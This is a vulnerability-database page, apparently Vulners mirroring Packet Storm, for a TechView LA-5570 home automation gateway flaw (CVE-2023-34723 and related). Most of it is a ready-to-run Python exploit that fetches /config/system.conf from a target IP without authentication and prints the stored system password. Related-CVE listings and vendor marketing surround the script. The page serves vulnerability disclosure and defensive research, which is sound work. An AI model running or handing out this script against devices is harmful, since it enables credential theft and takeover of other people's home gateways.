Vulners
Lucene search
TECHView LA5570 Wireless Gateway 1.0.19_T53 Traversal / Privilege Escalation
🗓️ 08 Sep 2023 00:00:00Reported by The Security Team, exploitsecurity.ioType 
packetstorm🔗 packetstormsecurity.com👁 413 Views
| Reporter | Title | Published | Views | Family All 37 |
|---|---|---|---|---|
 | Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities | 11 Sep 202300:00 | – | zdt |
 | CVE-2023-34725 | 28 Aug 202322:15 | – | attackerkb |
| CVE-2023-34724 | 28 Aug 202322:15 | – | attackerkb |
| CVE-2023-34723 | 25 Aug 202322:15 | – | attackerkb |
 | CVE-2023-34723 | 26 Aug 202302:30 | – | circl |
| CVE-2023-34724 | 29 Aug 202302:20 | – | circl |
| CVE-2023-34725 | 29 Aug 202302:20 | – | circl |
 | TechView LA-5570 后置链接漏洞 | 25 Aug 202300:00 | – | cnnvd |
| TechView LA-5570 安全漏洞 | 28 Aug 202300:00 | – | cnnvd |
| TechView LA-5570 安全漏洞 | 28 Aug 202300:00 | – | cnnvd |
10
`# Exploit Title: Techview LA-5570 Wireless Gateway Home Automation Controller - Multiple Vulnerabilities
# Google Dork: N/A
# Date: 25/08/2023
# Exploit Author: The Security Team [exploitsecurity.io<http://exploitsecurity.io>]
# Vendor Homepage: https://www.jaycar.com.au/wireless-gateway-home-automation-controller/p/LA5570
# Software Link: N/A
# Version: 1.0.19_T53
# Tested on: MACOS/Linux
# CVE : CVE-2023-34723
# POC Code Available: https://www.exploitsecurity.io/post/cve-2023-34723-cve-2023-34724-cve-2023-34725
#!/opt/homebrew/bin/python3
import requests
import sys
from time import sleep
from urllib3.exceptions import InsecureRequestWarning
from colorama import init
from colorama import Fore, Back, Style
import re
import os
import ipaddress
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
def banner():
if os.name == 'posix':
clr_cmd = ('clear')
elif os.name == 'nt':
clr_cmd = ('cls')
os.system(clr_cmd)
print ("[+]****************************************************[+]")
print (" | Author : The Security Team |")
print (" | Company : "+Fore.RED+ "Exploit Security" +Style.RESET_ALL+"\t\t\t|")
print (" | Description : TechVIEW LA-5570 Directory Traversal |")
print (" | Usage : "+sys.argv[0]+" <target> |")
print ("[+]****************************************************[+]")
def usage():
print (f"Usage: {sys.argv[0]} <target>")
def main(target):
domain = "http://"+target+"/config/system.conf"
try:
url = domain.strip()
r = requests.get(url, verify=False, timeout=3)
print ("[+] Retrieving credentials", flush=True, end='')
sleep(1)
print(" .", flush=True, end='')
sleep(1)
print(" .", flush=True, end='')
sleep(1)
print(" .", flush=True, end='')
if ("system_password" in r.text):
data = (r.text.split("\n"))
print (f"\n{data[1]}")
else:
print (Fore.RED + "[!] Target is not vulnerable !"+ Style.RESET_ALL)
except TimeoutError:
print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
except KeyboardInterrupt:
return
except requests.exceptions.Timeout:
print (Fore.RED + "[!] Timeout connecting to target !"+ Style.RESET_ALL)
return
if __name__ == '__main__':
if len(sys.argv)>1:
banner()
target = sys.argv[1]
try:
validate = ipaddress.ip_address(target)
if (validate):
main (target)
except ValueError as e:
print (Fore.RED + "[!] " + str(e) + " !" + Style.RESET_ALL)
else:
print (Fore.RED + f"[+] Not enough arguments, please specify target !" + Style.RESET_ALL)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Sep 2023 00:00Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.5
EPSS0.04352
SSVC